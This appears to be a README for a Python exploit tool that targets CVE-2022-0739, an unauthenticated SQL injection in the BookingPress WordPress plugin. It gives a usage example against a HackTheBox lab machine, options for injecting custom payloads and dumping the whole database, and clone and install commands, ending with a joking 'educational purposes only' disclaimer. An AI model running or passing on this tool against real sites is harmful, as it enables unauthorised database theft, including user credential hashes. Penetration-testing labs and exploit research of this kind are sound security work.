My take on CVE-2022-0739 BookingPress exploit, based on destr4ct's POC - just prettier.
Example usage against HackTheBox's MetaTwo machine, which hosts a WordPress with a vulnerable bookingpress plugin (version 1.0.10).
python booking-sqlinjector.py -u http://metapress.htb -nu http://metapress.htb/events/ -a -o db_dump
usage: booking-sqlinjector.py [-h] -u URL [-o BASENAME] [-p PAYLOAD] [-a] [-v] (-n NONCE | -nu NONCE_URL)
options:
-h, --help show this help message and exit
-u URL, --url URL URL of WordPress server with vulnerable plugin (http://example.domain)
-o BASENAME, --out BASENAME
Output database schema and dump in JSON format
-p PAYLOAD, --payload PAYLOAD
Payload to inject. Should start with ')'
-a, --dump-all Enables whole DB dump
-v, --verbose Enables verbose mode
-n NONCE, --nonce NONCE
Nonce that you got as unauthenticated user
-nu NONCE_URL, --nonce-url NONCE_URL
URL where nonce can be extracted (bookingprss form page)git clone https://github.com/viardant/CVE-2022-0739
cd CVE-2022-0739
pip install -r requirements.txtTL:DR; For educational purposes only, do not break stuff that you don't own or have permission to pentest. If you use this program for any nefarious purposes, the cybersecurity gods may smite your computer with a malware so devastating, you'll wish you had just bought a Mac.